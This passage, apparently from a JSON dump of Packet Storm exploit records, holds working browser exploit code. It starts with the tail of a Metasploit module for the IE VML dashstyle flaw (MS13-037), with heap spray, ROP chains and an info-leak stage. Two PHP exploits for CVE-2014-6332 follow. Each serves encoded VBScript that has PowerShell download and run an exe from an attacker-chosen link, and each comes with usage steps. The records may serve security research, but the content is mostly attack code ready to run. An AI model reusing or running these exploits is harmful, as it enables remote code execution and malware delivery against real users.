\nos_name = 'Windows 7' \nend \n \ntargets.each do |t| \nif (!ie.empty? and t.name.include?(ie_name)) and (!nt.empty? and t.name.include?(os_name)) \nprint_status(\"Target selected as: #{t.name}\") \nreturn t \nend \nend \n \nreturn nil \nend \n \ndef ie_heap_spray(my_target, p) \njs_code = Rex::Text.to_unescape(p, Rex::Arch.endian(target.arch)) \njs_nops = Rex::Text.to_unescape(\"\\x0c\"*4, Rex::Arch.endian(target.arch)) \n \n# Land the payload at 0x0c0c0c0c \n# For IE 8 \njs = %Q| \nvar heap_obj = new heapLib.ie(0x20000); \nvar code = unescape(\"#{js_code}\"); \nvar nops = unescape(\"#{js_nops}\"); \nwhile (nops.length < 0x80000) nops += nops; \nvar offset = nops.substring(0, #{my_target['Offset']}); \nvar shellcode = offset + code + nops.substring(0, 0x800-code.length-offset.length); \nwhile (shellcode.length < 0x40000) shellcode += shellcode; \nvar block = shellcode.substring(0, (0x80000-6)/2); \nheap_obj.gc(); \nfor (var i=1; i < 0x300; i++) { \nheap_obj.alloc(block); \n} \n| \n \njs = heaplib(js, {:noobfu => true}) \n \nif datastore['OBFUSCATE'] \njs = ::Rex::Exploitation::JSObfu.new(js) \njs.obfuscate \nend \n \nreturn js \nend \n \ndef get_ntdll_rop \ncase @ntdll_version \nwhen \"6.1.7601.17514\" \nstack_pivot = [ \n@ntdll_base+0x0001578a, # ret # from ntdll \n@ntdll_base+0x000096c9, # pop ebx # ret # from ntdll \n@ntdll_base+0x00015789, # xchg eax, esp # ret from ntdll \n].pack(\"V*\") \nntdll_rop = [ \n@ntdll_base+0x45F18, # ntdll!ZwProtectVirtualMemory \n0x0c0c0c40, # ret to shellcode \n0xffffffff, # ProcessHandle \n0x0c0c0c34, # ptr to BaseAddress \n0x0c0c0c38, # ptr to NumberOfBytesToProtect \n0x00000040, # NewAccessProtection \n0x0c0c0c3c, # ptr to OldAccessProtection \n0x0c0c0c40, # BaseAddress \n0x00000400, # NumberOfBytesToProtect \n0x41414141 # OldAccessProtection \n].pack(\"V*\") \nreturn stack_pivot + ntdll_rop \nwhen \"6.1.7601.17725\" \nstack_pivot = [ \n@ntdll_base+0x0001579a, # ret # from ntdll \n@ntdll_base+0x000096c9, # pop ebx # ret # 
from ntdll \n@ntdll_base+0x00015799, # xchg eax, esp # ret from ntdll \n].pack(\"V*\") \nntdll_rop = [ \n@ntdll_base+0x45F18, # ntdll!ZwProtectVirtualMemory \n0x0c0c0c40, # ret to shellcode \n0xffffffff, # ProcessHandle \n0x0c0c0c34, # ptr to BaseAddress \n0x0c0c0c38, # ptr to NumberOfBytesToProtect \n0x00000040, # NewAccessProtection \n0x0c0c0c3c, # ptr to OldAccessProtection \n0x0c0c0c40, # BaseAddress \n0x00000400, # NumberOfBytesToProtect \n0x41414141 # OldAccessProtection \n].pack(\"V*\") \nreturn stack_pivot + ntdll_rop \nelse \nreturn \"\" \nend \nend \n \ndef get_payload(t, cli) \ncode = payload.encoded \n# No rop. Just return the payload. \nreturn code if t['Rop'].nil? \n \n# Both ROP chains generated by mona.py - See corelan.be \ncase t['Rop'] \nwhen :jre \nprint_status(\"Using JRE ROP\") \nstack_pivot = [ \n0x7c348b06, # ret # from msvcr71 \n0x7c341748, # pop ebx # ret # from msvcr71 \n0x7c348b05 # xchg eax, esp # ret from msvcr71 \n].pack(\"V*\") \nrop_payload = generate_rop_payload('java', code, {'pivot'=>stack_pivot}) \nwhen :ntdll \nprint_status(\"Using ntdll ROP\") \nrop_payload = get_ntdll_rop + payload.encoded \nend \n \nreturn rop_payload \nend \n \ndef load_exploit_html(my_target, cli) \np = get_payload(my_target, cli) \njs = ie_heap_spray(my_target, p) \n \njs_trigger = %Q| \nvar rect_array = new Array() \nvar a = new Array() \n \nfunction createRects(){ \nfor(var i=0; i<0x1000; i++){ \nrect_array[i] = document.createElement(\"v:shape\") \nrect_array[i].id = \"rect\" + i.toString() \ndocument.body.appendChild(rect_array[i]) \n} \n} \n \nfunction exploit(){ \n \nvar vml1 = document.getElementById(\"vml1\") \n \nfor (var i=0; i<0x1000; i++){ \na[i] = document.getElementById(\"rect\" + i.toString())._anchorRect; \nif (i == 0x800) { \nvml1.dashstyle = \"1 2 3 4\" \n} \n} \n \nvml1.dashstyle.array.length = 0 - 1; \nvml1.dashstyle.array.item(6) = 0x0c0c0c0c; \n \nfor (var i=0; i<0x1000; i++) \n{ \ndelete a[i]; \nCollectGarbage(); \n} 
\nlocation.reload(); \n \n} \n| \n \ncreate_rects_func = \"createRects\" \nexploit_func = \"exploit\" \n \nif datastore['OBFUSCATE'] \njs_trigger = ::Rex::Exploitation::JSObfu.new(js_trigger) \njs_trigger.obfuscate \ncreate_rects_func = js_trigger.sym(\"createRects\") \nexploit_func = js_trigger.sym(\"exploit\") \nend \n \nhtml = %Q| \n<html> \n<head> \n<script> \n#{js} \n</script> \n<meta http-equiv=\"x-ua-compatible\" content=\"IE=EmulateIE9\" > \n</head> \n<title> \n</title> \n<style>v\\\\: * { behavior:url(#default#VML); display:inline-block }</style> \n<xml:namespace ns=\"urn:schemas-microsoft-com:vml\" prefix=\"v\" /> \n<script> \n#{js_trigger} \n</script> \n<body onload=\"#{create_rects_func}(); #{exploit_func}();\"> \n<v:oval> \n<v:stroke id=\"vml1\"/> \n</v:oval> \n</body> \n</html> \n| \n \nreturn html \nend \n \ndef html_info_leak \n \njs_trigger = %Q| \nvar rect_array = new Array() \nvar a = new Array() \n \nfunction createRects(){ \nfor(var i=0; i<0x400; i++){ \nrect_array[i] = document.createElement(\"v:shape\") \nrect_array[i].id = \"rect\" + i.toString() \ndocument.body.appendChild(rect_array[i]) \n} \n} \n \nfunction exploit(){ \n \nvar vml1 = document.getElementById(\"vml1\") \n \nfor (var i=0; i<0x400; i++){ \na[i] = document.getElementById(\"rect\" + i.toString())._vgRuntimeStyle; \n} \n \nfor (var i=0; i<0x400; i++){ \na[i].rotation; \nif (i == 0x300) { \nvml1.dashstyle = \"1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44\" \n} \n} \n \nvar length_orig = vml1.dashstyle.array.length; \nvml1.dashstyle.array.length = 0 - 1; \n \nfor (var i=0; i<0x400; i++) \n{ \na[i].marginLeft = \"a\"; \nmarginLeftAddress = vml1.dashstyle.array.item(0x2E+0x16); \nif (marginLeftAddress > 0) { \nvml1.dashstyle.array.item(0x2E+0x16) = 0x7ffe0300; \nvar leak = a[i].marginLeft; \nvml1.dashstyle.array.item(0x2E+0x16) = marginLeftAddress; \nvml1.dashstyle.array.length = length_orig; 
\ndocument.location = \"#{get_resource}/#{@second_stage_url}\" + \"?#{@leak_param}=\" + parseInt( leak.charCodeAt(1).toString(16) + leak.charCodeAt(0).toString(16), 16 ) \nreturn; \n} \n} \n \n} \n| \n \ncreate_rects_func = \"createRects\" \nexploit_func = \"exploit\" \n \nif datastore['OBFUSCATE'] \njs_trigger = ::Rex::Exploitation::JSObfu.new(js_trigger) \njs_trigger.obfuscate \ncreate_rects_func = js_trigger.sym(\"createRects\") \nexploit_func = js_trigger.sym(\"exploit\") \nend \n \nhtml = %Q| \n<html> \n<head> \n<meta http-equiv=\"x-ua-compatible\" content=\"IE=EmulateIE9\" > \n</head> \n<title> \n</title> \n<style>v\\\\: * { behavior:url(#default#VML); display:inline-block }</style> \n<xml:namespace ns=\"urn:schemas-microsoft-com:vml\" prefix=\"v\" /> \n<script> \n#{js_trigger} \n</script> \n<body onload=\"#{create_rects_func}(); #{exploit_func}();\"> \n<v:oval> \n<v:stroke id=\"vml1\"/> \n</v:oval> \n</body> \n</html> \n| \n \nreturn html \n \nend \n \ndef on_request_uri(cli, request) \nagent = request.headers['User-Agent'] \nuri = request.uri \nprint_status(\"Requesting: #{uri}\") \n \nmy_target = get_target(agent) \n# Avoid the attack if no suitable target found \nif my_target.nil? 
\nprint_error(\"Browser not supported, sending 404: #{agent}\") \nsend_not_found(cli) \nreturn \nend \n \nif my_target['Rop'] == :ntdll and request.uri !~ /#{@second_stage_url}/ \nhtml = html_info_leak \nhtml = html.gsub(/^\\t\\t/, '') \nprint_status(\"Sending HTML to info leak...\") \nsend_response(cli, html, {'Content-Type'=>'text/html'}) \nelse \nleak = begin \nrequest.uri_parts[\"QueryString\"][@leak_param].to_i \nrescue \n0 \nend \n \nif leak == 0 \nhtml = load_exploit_html(my_target, cli) \nhtml = html.gsub(/^\\t\\t/, '') \nprint_status(\"Sending HTML to trigger...\") \nsend_response(cli, html, {'Content-Type'=>'text/html'}) \nreturn \nend \n \nvprint_status(\"ntdll leak: 0x#{leak.to_s(16)}\") \nfingerprint = leak & 0x0000ffff \n \ncase fingerprint \nwhen 0x70B0 \n@ntdll_version = \"6.1.7601.17514\" \n@ntdll_base = leak - 0x470B0 \nwhen 0x7090 \n@ntdll_version = \"6.1.7601.17725\" # MS12-001 \n@ntdll_base = leak - 0x47090 \nelse \nprint_error(\"ntdll version not detected, sending 404: #{agent}\") \nsend_not_found(cli) \nreturn \nend \n \nhtml = load_exploit_html(my_target, cli) \nhtml = html.gsub(/^\\t\\t/, '') \nprint_status(\"Sending HTML to trigger...\") \nsend_response(cli, html, {'Content-Type'=>'text/html'}) \n \nend \n \nend \n \nend`\n", "sourceHref": "https://packetstormsecurity.com/files/download/121997/ms13_037_svg_dashstyle.rb.txt", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2016-12-05T22:19:45", "description": "", "cvss3": {}, "published": "2015-06-26T00:00:00", "type": "packetstorm", "title": "Havij OLE Automation Array Remote Code Execution", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2014-6332"], "modified": "2015-06-26T00:00:00", "id": "PACKETSTORM:132462", "href": "https://packetstormsecurity.com/files/132462/Havij-OLE-Automation-Array-Remote-Code-Execution.html", "sourceData": "`#!/usr/bin/php \n<?php \n# Title : Havij OLE Automation Array Remote Code 
Execution \n# Affected Versions: All Version \n# Founder : ITSecTeam \n# Tested on Windows 7 / Server 2008 \n# \n# \n# Author : Mohammad Reza Espargham \n# Linkedin : https://ir.linkedin.com/in/rezasp \n# E-Mail : me[at]reza[dot]es , reza.espargham[at]gmail[dot]com \n# Website : www.reza.es \n# Twitter : https://twitter.com/rezesp \n# FaceBook : https://www.facebook.com/mohammadreza.espargham \n# \n# \n# OleAut32.dll Exploit MS14-064 CVE2014-6332 \n# \n# \n# 1 . run php code : php havij.php \n# 2 . open \"Havij\" and Enter your exploit link http://ipaddress:80/ \n# 3 . go to \"Setting\" and Click \"Load Cookie\" \n# 4 . Your Link Download/Execute on your target \n# 5 . Finished ;) \n \n#Youtube : https://www.youtube.com/watch?v=svU8SuJhaVY \n \n$port=80; # Port Address \n$link=\"http://the.earth.li/~sgtatham/putty/latest/x86/putty.exe\"; # Your exe link \n \n$reza = socket_create(AF_INET, SOCK_STREAM, 0) or die('Failed to create socket!'); \nsocket_bind($reza, 0,$port); \nsocket_listen($reza); \nprint \" Mohammad Reza Espargham\\n www.reza.es\\n\\nYour Link = http://ipaddress:$port / http://127.0.0.1:$port\\n\\n\"; \n \n$msg = 'PGh0bWw+CjxtZXRhIGh0dHAtZXF1aXY9IlgtVUEtQ29tcGF0aWJsZSIgY29udGVudD0iSUU9RW11 \nbGF0ZUlFOCIgPgo8aGVhZD4KPC9oZWFkPgo8Ym9keT4KIAo8U0NSSVBUIExBTkdVQUdFPSJWQlNj \ncmlwdCI+CgpmdW5jdGlvbiBydW5tdW1hYSgpIApPbiBFcnJvciBSZXN1bWUgTmV4dApzZXQgc2hl \nbGw9Y3JlYXRlb2JqZWN0KCJTaGVsbC5BcHBsaWNhdGlvbiIpCmNvbW1hbmQ9Ikludm9rZS1FeHBy \nZXNzaW9uICQoTmV3LU9iamVjdCBTeXN0ZW0uTmV0LldlYkNsaWVudCkuRG93bmxvYWRGaWxlKCdG \nSUxFX0RPV05MT0FEJywnbG9hZC5leGUnKTskKE5ldy1PYmplY3QgLWNvbSBTaGVsbC5BcHBsaWNh \ndGlvbikuU2hlbGxFeGVjdXRlKCdsb2FkLmV4ZScpOyIKc2hlbGwuU2hlbGxFeGVjdXRlICJwb3dl \ncnNoZWxsLmV4ZSIsICItQ29tbWFuZCAiICYgY29tbWFuZCwgIiIsICJydW5hcyIsIDAKZW5kIGZ1 \nbmN0aW9uCjwvc2NyaXB0PgogCjxTQ1JJUFQgTEFOR1VBR0U9IlZCU2NyaXB0Ij4KICAKZGltICAg \nYWEoKQpkaW0gICBhYigpCmRpbSAgIGEwCmRpbSAgIGExCmRpbSAgIGEyCmRpbSAgIGEzCmRpbSAg 
\nIHdpbjl4CmRpbSAgIGludFZlcnNpb24KZGltICAgcm5kYQpkaW0gICBmdW5jbGFzcwpkaW0gICBt \neWFycmF5CiAKQmVnaW4oKQogCmZ1bmN0aW9uIEJlZ2luKCkKICBPbiBFcnJvciBSZXN1bWUgTmV4 \ndAogIGluZm89TmF2aWdhdG9yLlVzZXJBZ2VudAogCiAgaWYoaW5zdHIoaW5mbywiV2luNjQiKT4w \nKSAgIHRoZW4KICAgICBleGl0ICAgZnVuY3Rpb24KICBlbmQgaWYKIAogIGlmIChpbnN0cihpbmZv \nLCJNU0lFIik+MCkgICB0aGVuIAogICAgICAgICAgICAgaW50VmVyc2lvbiA9IENJbnQoTWlkKGlu \nZm8sIEluU3RyKGluZm8sICJNU0lFIikgKyA1LCAyKSkgICAKICBlbHNlCiAgICAgZXhpdCAgIGZ1 \nbmN0aW9uICAKICAgICAgICAgICAgICAKICBlbmQgaWYKIAogIHdpbjl4PTAKIAogIEJlZ2luSW5p \ndCgpCiAgSWYgQ3JlYXRlKCk9VHJ1ZSBUaGVuCiAgICAgbXlhcnJheT0gICAgICAgIGNocncoMDEp \nJmNocncoMjE3NikmY2hydygwMSkmY2hydygwMCkmY2hydygwMCkmY2hydygwMCkmY2hydygwMCkm \nY2hydygwMCkKICAgICBteWFycmF5PW15YXJyYXkmY2hydygwMCkmY2hydygzMjc2NykmY2hydygw \nMCkmY2hydygwKQogCiAgICAgaWYoaW50VmVyc2lvbjw0KSB0aGVuCiAgICAgICAgIGRvY3VtZW50 \nLndyaXRlKCI8YnI+IElFIikKICAgICAgICAgZG9jdW1lbnQud3JpdGUoaW50VmVyc2lvbikKICAg \nICAgICAgcnVuc2hlbGxjb2RlKCkgICAgICAgICAgICAgICAgICAgIAogICAgIGVsc2UgIAogICAg \nICAgICAgc2V0bm90c2FmZW1vZGUoKQogICAgIGVuZCBpZgogIGVuZCBpZgplbmQgZnVuY3Rpb24K \nIApmdW5jdGlvbiBCZWdpbkluaXQoKQogICBSYW5kb21pemUoKQogICByZWRpbSBhYSg1KQogICBy \nZWRpbSBhYig1KQogICBhMD0xMysxNypybmQoNikKICAgYTM9NyszKnJuZCg1KQplbmQgZnVuY3Rp \nb24KIApmdW5jdGlvbiBDcmVhdGUoKQogIE9uIEVycm9yIFJlc3VtZSBOZXh0CiAgZGltIGkKICBD \ncmVhdGU9RmFsc2UKICBGb3IgaSA9IDAgVG8gNDAwCiAgICBJZiBPdmVyKCk9VHJ1ZSBUaGVuCiAg \nICAgICBDcmVhdGU9VHJ1ZQogICAgICAgRXhpdCBGb3IKICAgIEVuZCBJZiAKICBOZXh0CmVuZCBm \ndW5jdGlvbgogCnN1YiB0ZXN0YWEoKQplbmQgc3ViCiAKZnVuY3Rpb24gbXlkYXRhKCkKICAgIE9u \nIEVycm9yIFJlc3VtZSBOZXh0CiAgICAgaT10ZXN0YWEKICAgICBpPW51bGwKICAgICByZWRpbSAg \nUHJlc2VydmUgYWEoYTIpICAKICAgCiAgICAgYWIoMCk9MAogICAgIGFhKGExKT1pCiAgICAgYWIo \nMCk9Ni4zNjU5ODczNzQzNzgwMUUtMzE0CiAKICAgICBhYShhMSsyKT1teWFycmF5CiAgICAgYWIo \nMik9MS43NDA4ODUzNDczMTMyNEUtMzEwICAKICAgICBteWRhdGE9YWEoYTEpCiAgICAgcmVkaW0g \nIFByZXNlcnZlIGFhKGEwKSAgCmVuZCBmdW5jdGlvbiAKIAogCmZ1bmN0aW9uIHNldG5vdHNhZmVt 
\nb2RlKCkKICAgIE9uIEVycm9yIFJlc3VtZSBOZXh0CiAgICBpPW15ZGF0YSgpICAKICAgIGk9cnVt \nKGkrOCkKICAgIGk9cnVtKGkrMTYpCiAgICBqPXJ1bShpKyZoMTM0KSAgCiAgICBmb3Igaz0wIHRv \nICZoNjAgc3RlcCA0CiAgICAgICAgaj1ydW0oaSsmaDEyMCtrKQogICAgICAgIGlmKGo9MTQpIHRo \nZW4KICAgICAgICAgICAgICBqPTAgICAgICAgICAgCiAgICAgICAgICAgICAgcmVkaW0gIFByZXNl \ncnZlIGFhKGEyKSAgICAgICAgICAgICAKICAgICBhYShhMSsyKShpKyZoMTFjK2spPWFiKDQpCiAg \nICAgICAgICAgICAgcmVkaW0gIFByZXNlcnZlIGFhKGEwKSAgCiAKICAgICBqPTAgCiAgICAgICAg \nICAgICAgaj1ydW0oaSsmaDEyMCtrKSAgIAogICAgICAgICAgCiAgICAgICAgICAgICAgIEV4aXQg \nZm9yCiAgICAgICAgICAgZW5kIGlmCiAKICAgIG5leHQgCiAgICBhYigyKT0xLjY5NzU5NjYzMzE2 \nNzQ3RS0zMTMKICAgIHJ1bm11bWFhKCkgCmVuZCBmdW5jdGlvbgogCmZ1bmN0aW9uIE92ZXIoKQog \nICAgT24gRXJyb3IgUmVzdW1lIE5leHQKICAgIGRpbSB0eXBlMSx0eXBlMix0eXBlMwogICAgT3Zl \ncj1GYWxzZQogICAgYTA9YTArYTMKICAgIGExPWEwKzIKICAgIGEyPWEwKyZoODAwMDAwMAogICAK \nICAgIHJlZGltICBQcmVzZXJ2ZSBhYShhMCkgCiAgICByZWRpbSAgIGFiKGEwKSAgICAgCiAgIAog \nICAgcmVkaW0gIFByZXNlcnZlIGFhKGEyKQogICAKICAgIHR5cGUxPTEKICAgIGFiKDApPTEuMTIz \nNDU2Nzg5MDEyMzQ1Njc4OTAxMjM0NTY3ODkwCiAgICBhYShhMCk9MTAKICAgICAgICAgICAKICAg \nIElmKElzT2JqZWN0KGFhKGExLTEpKSA9IEZhbHNlKSBUaGVuCiAgICAgICBpZihpbnRWZXJzaW9u \nPDQpIHRoZW4KICAgICAgICAgICBtZW09Y2ludChhMCsxKSoxNiAgICAgICAgICAgICAKICAgICAg \nICAgICBqPXZhcnR5cGUoYWEoYTEtMSkpCiAgICAgICAgICAgaWYoKGo9bWVtKzQpIG9yIChqKjg9 \nbWVtKzgpKSB0aGVuCiAgICAgICAgICAgICAgaWYodmFydHlwZShhYShhMS0xKSk8PjApICBUaGVu \nICAgIAogICAgICAgICAgICAgICAgIElmKElzT2JqZWN0KGFhKGExKSkgPSBGYWxzZSApIFRoZW4g \nICAgICAgICAgICAgCiAgICAgICAgICAgICAgICAgICB0eXBlMT1WYXJUeXBlKGFhKGExKSkKICAg \nICAgICAgICAgICAgICBlbmQgaWYgICAgICAgICAgICAgICAKICAgICAgICAgICAgICBlbmQgaWYK \nICAgICAgICAgICBlbHNlCiAgICAgICAgICAgICByZWRpbSAgUHJlc2VydmUgYWEoYTApCiAgICAg \nICAgICAgICBleGl0ICBmdW5jdGlvbgogCiAgICAgICAgICAgZW5kIGlmIAogICAgICAgIGVsc2UK \nICAgICAgICAgICBpZih2YXJ0eXBlKGFhKGExLTEpKTw+MCkgIFRoZW4gICAgCiAgICAgICAgICAg \nICAgSWYoSXNPYmplY3QoYWEoYTEpKSA9IEZhbHNlICkgVGhlbgogICAgICAgICAgICAgICAgICB0 
\neXBlMT1WYXJUeXBlKGFhKGExKSkKICAgICAgICAgICAgICBlbmQgaWYgICAgICAgICAgICAgICAK \nICAgICAgICAgICAgZW5kIGlmCiAgICAgICAgZW5kIGlmCiAgICBlbmQgaWYKICAgICAgICAgICAg \nICAgCiAgICAgCiAgICBJZih0eXBlMT0maDJmNjYpIFRoZW4gICAgICAgICAKICAgICAgICAgIE92 \nZXI9VHJ1ZSAgICAgIAogICAgRW5kIElmICAKICAgIElmKHR5cGUxPSZoQjlBRCkgVGhlbgogICAg \nICAgICAgT3Zlcj1UcnVlCiAgICAgICAgICB3aW45eD0xCiAgICBFbmQgSWYgIAogCiAgICByZWRp \nbSAgUHJlc2VydmUgYWEoYTApICAgICAgICAgIAogICAgICAgICAKZW5kIGZ1bmN0aW9uCiAKZnVu \nY3Rpb24gcnVtKGFkZCkgCiAgICBPbiBFcnJvciBSZXN1bWUgTmV4dAogICAgcmVkaW0gIFByZXNl \ncnZlIGFhKGEyKSAgCiAgIAogICAgYWIoMCk9MCAgIAogICAgYWEoYTEpPWFkZCs0ICAgICAKICAg \nIGFiKDApPTEuNjk3NTk2NjMzMTY3NDdFLTMxMyAgICAgICAKICAgIHJ1bT1sZW5iKGFhKGExKSkg \nIAogICAgCiAgICBhYigwKT0wCiAgICByZWRpbSAgUHJlc2VydmUgYWEoYTApCmVuZCBmdW5jdGlv \nbgogCjwvc2NyaXB0PgogCjwvYm9keT4KPC9odG1sPg=='; \n$msgd=base64_decode($msg); \n$msgd=str_replace(\"FILE_DOWNLOAD\",$link,$msgd); \n \nfor (;;) { \nif ($client = @socket_accept($reza)) { \nsocket_write($client, \"HTTP/1.1 200 OK\\r\\n\" . \n\"Content-length: \" . strlen($msgd) . \"\\r\\n\" . \n\"Content-Type: text/html; charset=UTF-8\\r\\n\\r\\n\" . 
\n$msgd); \nprint \"\\n Target Checked Your Link \\n\"; \n} \nelse usleep(100000); \n} \n \n \n?> \n`\n", "sourceHref": "https://packetstormsecurity.com/files/download/132462/havijole-exec.txt", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2016-12-05T22:20:00", "description": "", "cvss3": {}, "published": "2015-10-22T00:00:00", "type": "packetstorm", "title": "The World Browser 3.0 Final Remote Code Execution", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2014-6332"], "modified": "2015-10-22T00:00:00", "id": "PACKETSTORM:134061", "href": "https://packetstormsecurity.com/files/134061/The-World-Browser-3.0-Final-Remote-Code-Execution.html", "sourceData": "`#!/usr/bin/php \n<?php \n########################################################## \n# Author : Ehsan Noreddini \n# E-Mail : me@ehsann.info \n# Social : @prot3ct0r \n# Title : The World Browser Remote Code Execution \n# TheWorld Browser is a tiny, fast and powerful web Browser. It is completely free. There is no function limitation. \n# Version : 3.0 Final \n# Date : 22 October 2015 \n# CVE : CVE2014-6332 \n# Tested on : Windows7 \n# Download : http://theworld.cn/twen/download.html \n# Website : http://theworld.cn \n########################################################## \n# 1. run php code : php exploit.php \n# 2. get the output address and open it in browser ! 
\n########################################################## \n# shot : http://ehsann.info/proof/The_World_Browser_R_C_E.png \n# Original Code : http://ehsann.info/exploit/4.txt \n########################################################## \n \nprint \"TheWorld Browser Remote Code Execution Exploit \\r\\n\"; \n$port=80; # Port Address \n$link=\"http://the.earth.li/~sgtatham/putty/latest/x86/putty.exe\"; # Your malicious file \n$socket = socket_create(AF_INET, SOCK_STREAM, 0) or die('Failed to create socket!'); \nsocket_bind($socket, 0,$port); \nsocket_listen($socket); \n# MS14-064 \n$msgd = \"\\x3C\\x68\\x74\\x6D\\x6C\\x3E\\x0D\\x0A\\x3C\\x6D\\x65\\x74\\x61\\x20\\x68\\x74\\x74\\x70\\x2D\\x65\\x71\\x75\\x69\\x76\\x3D\\x22\\x58\\x2D\\x55\\x41\\x2D\\x43\\x6F\\x6D\\x70\\x61\\x74\\x69\\x62\\x6C\\x65\\x22\\x20\\x63\\x6F\\x6E\\x74\\x65\\x6E\\x74\\x3D\\x22\\x49\\x45\\x3D\\x45\\x6D\\x75\\x6C\\x61\\x74\\x65\\x49\\x45\\x38\\x22\\x20\\x3E\\x0D\\x0A\\x3C\\x68\\x65\\x61\\x64\\x3E\\x0D\\x0A\\x3C\\x2F\\x68\\x65\\x61\\x64\\x3E\\x0D\\x0A\\x3C\\x62\\x6F\\x64\\x79\\x3E\\x0D\\x0A\\x20\\x0D\\x0A\\x3C\\x53\\x43\\x52\\x49\\x50\\x54\\x20\\x4C\\x41\\x4E\\x47\\x55\\x41\\x47\\x45\\x3D\\x22\\x56\\x42\\x53\\x63\\x72\\x69\\x70\\x74\\x22\\x3E\\x0D\\x0A\\x66\\x75\\x6E\\x63\\x74\\x69\\x6F\\x6E\\x20\\x72\\x75\\x6E\\x6D\\x75\\x6D\\x61\\x61\\x28\\x29\\x20\\x0D\\x0A\\x4F\\x6E\\x20\\x45\\x72\\x72\\x6F\\x72\\x20\\x52\\x65\\x73\\x75\\x6D\\x65\\x20\\x4E\\x65\\x78\\x74\\x0D\\x0A\\x73\\x65\\x74\\x20\\x73\\x68\\x65\\x6C\\x6C\\x3D\\x63\\x72\\x65\\x61\\x74\\x65\\x6F\\x62\\x6A\\x65\\x63\\x74\\x28\\x22\\x53\\x68\\x65\\x6C\\x6C\\x2E\\x41\\x70\\x70\\x6C\\x69\\x63\\x61\\x74\\x69\\x6F\\x6E\\x22\\x29\\x0D\\x0A\\x63\\x6F\\x6D\\x6D\\x61\\x6E\\x64\\x3D\\x22\\x49\\x6E\\x76\\x6F\\x6B\\x65\\x2D\\x45\\x78\\x70\\x72\\x65\\x73\\x73\\x69\\x6F\\x6E\\x20\\x24\\x28\\x4E\\x65\\x77\\x2D\\x4F\\x62\\x6A\\x65\\x63\\x74\\x20\\x53\\x79\\x73\\x74\\x65\\x6D\\x2E\\x4E\\x65\\x74\\x2E\\x57\\x65\\x62\\x43\\x6C\\x69\\x65\\x6E\\x74\\x29\\x2E\\x44\
\x6F\\x77\\x6E\\x6C\\x6F\\x61\\x64\\x46\\x69\\x6C\\x65\\x28\\x27\\x44\\x4F\\x57\\x4E\\x4C\\x4F\\x41\\x44\\x27\\x2C\\x27\\x6C\\x6F\\x61\\x64\\x2E\\x65\\x78\\x65\\x27\\x29\\x3B\\x24\\x28\\x4E\\x65\\x77\\x2D\\x4F\\x62\\x6A\\x65\\x63\\x74\\x20\\x2D\\x63\\x6F\\x6D\\x20\\x53\\x68\\x65\\x6C\\x6C\\x2E\\x41\\x70\\x70\\x6C\\x69\\x63\\x61\\x74\\x69\\x6F\\x6E\\x29\\x2E\\x53\\x68\\x65\\x6C\\x6C\\x45\\x78\\x65\\x63\\x75\\x74\\x65\\x28\\x27\\x6C\\x6F\\x61\\x64\\x2E\\x65\\x78\\x65\\x27\\x29\\x3B\\x22\\x0D\\x0A\\x73\\x68\\x65\\x6C\\x6C\\x2E\\x53\\x68\\x65\\x6C\\x6C\\x45\\x78\\x65\\x63\\x75\\x74\\x65\\x20\\x22\\x70\\x6F\\x77\\x65\\x72\\x73\\x68\\x65\\x6C\\x6C\\x2E\\x65\\x78\\x65\\x22\\x2C\\x20\\x22\\x2D\\x43\\x6F\\x6D\\x6D\\x61\\x6E\\x64\\x20\\x22\\x20\\x26\\x20\\x63\\x6F\\x6D\\x6D\\x61\\x6E\\x64\\x2C\\x20\\x22\\x22\\x2C\\x20\\x22\\x72\\x75\\x6E\\x61\\x73\\x22\\x2C\\x20\\x30\\x0D\\x0A\\x65\\x6E\\x64\\x20\\x66\\x75\\x6E\\x63\\x74\\x69\\x6F\\x6E\\x0D\\x0A\\x3C\\x2F\\x73\\x63\\x72\\x69\\x70\\x74\\x3E\\x0D\\x0A\\x20\\x0D\\x0A\\x3C\\x53\\x43\\x52\\x49\\x50\\x54\\x20\\x4C\\x41\\x4E\\x47\\x55\\x41\\x47\\x45\\x3D\\x22\\x56\\x42\\x53\\x63\\x72\\x69\\x70\\x74\\x22\\x3E\\x0D\\x0A\\x20\\x20\\x0D\\x0A\\x64\\x69\\x6D\\x20\\x20\\x20\\x61\\x61\\x28\\x29\\x0D\\x0A\\x64\\x69\\x6D\\x20\\x20\\x20\\x61\\x62\\x28\\x29\\x0D\\x0A\\x64\\x69\\x6D\\x20\\x20\\x20\\x61\\x30\\x0D\\x0A\\x64\\x69\\x6D\\x20\\x20\\x20\\x61\\x31\\x0D\\x0A\\x64\\x69\\x6D\\x20\\x20\\x20\\x61\\x32\\x0D\\x0A\\x64\\x69\\x6D\\x20\\x20\\x20\\x61\\x33\\x0D\\x0A\\x64\\x69\\x6D\\x20\\x20\\x20\\x77\\x69\\x6E\\x39\\x78\\x0D\\x0A\\x64\\x69\\x6D\\x20\\x20\\x20\\x69\\x6E\\x74\\x56\\x65\\x72\\x73\\x69\\x6F\\x6E\\x0D\\x0A\\x64\\x69\\x6D\\x20\\x20\\x20\\x72\\x6E\\x64\\x61\\x0D\\x0A\\x64\\x69\\x6D\\x20\\x20\\x20\\x66\\x75\\x6E\\x63\\x6C\\x61\\x73\\x73\\x0D\\x0A\\x64\\x69\\x6D\\x20\\x20\\x20\\x6D\\x79\\x61\\x72\\x72\\x61\\x79\\x0D\\x0A\\x20\\x0D\\x0A\\x42\\x65\\x67\\x69\\x6E\\x28\\x29\\x0D\\x0A\\x20\\x0D\\x0A\\x66\\x75\\x6E\\x63\\x74\\x69\\x6F\\x6E\\x20\
